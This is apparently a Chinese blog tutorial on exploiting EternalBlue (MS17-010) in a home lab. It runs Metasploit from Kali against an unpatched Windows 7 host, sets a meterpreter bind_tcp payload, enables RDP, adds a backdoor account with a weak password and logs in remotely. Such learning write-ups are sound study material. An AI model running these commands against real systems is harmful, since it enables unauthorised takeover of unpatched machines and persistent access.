kali linux學習(永恆之藍)

寫在之前

永恆之藍是2017年4月14日晚,黑客團體Shadow Brokers(影子經紀人)公佈一大批網絡攻擊工具,其中包含“永恆之藍”工具,“永恆之藍”利用Windows系統的SMB漏洞可以獲取系統最高權限。5月12日,不法分子通過改造“永恆之藍”製作了wannacry勒索病毒,英國、俄羅斯、整個歐洲以及中國國內多個高校校內網、大型企業內網和政府機構專網中招,被勒索支付高額贖金才能解密恢復文件。

準備工作

pc:windows7(未安裝補丁)和kali linux

尋找目標靶機

ifconig#查看本機的ip地址
nmap 192.168.1.0/24#掃描局域網內的其他主機

在這裏插入圖片描述
以ip爲192.168.1.5的主機爲靶機

使用msfconsole

msfconsole是一個強大的接口程序是一個一體化的集中控制檯。通過msfconsole,你可以訪問和使用所有的metasploit的插件,payload,利用模塊,post模塊等等。

msfconsole#進入msfconsole
use auxiliary/scanner/smb/smb_ms17_010#用來掃描漏洞
show option#查看需要設置的內容

在這裏插入圖片描述
yes的內容是需要設置的

set rhosts 192.168.1.5
run #執行進行掃描

在這裏插入圖片描述
在這裏插入圖片描述來自有道翻譯

use exploit/windows/smb/ms17_010_eternalblue#調用永恆之藍攻擊模塊
show option

在這裏插入圖片描述
有些內容已經填寫,我們只需要填寫靶機的ip地址和攻擊方式

set rhost 192.168.1.5
set payload windows/x64/meterpreter/bind_tcp#設置攻擊載荷
exploit#執行攻擊

在這裏插入圖片描述

遠程登錄win7

 run post/windows/manage/enable_rdp #啓動enable——rdp腳本
 run post/windows/manage/enable_rdp USERNAME=icbug   PASSWORD=123456#創建用戶

在這裏插入圖片描述
重新創建一個終端

rdesktop 192.168.1.5

在這裏插入圖片描述
輸入剛纔創建的賬號密碼
在這裏插入圖片描述
至此,我們就通過永恆之藍這個漏洞,登錄到win7系統上了。

整個過程主要是學習了GitChat的博客,最後附上原文的連接:https://blog.csdn.net/valada/article/details/104190432?utm_medium=distribute.pc_relevant.none-task-blog-baidujs-4

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章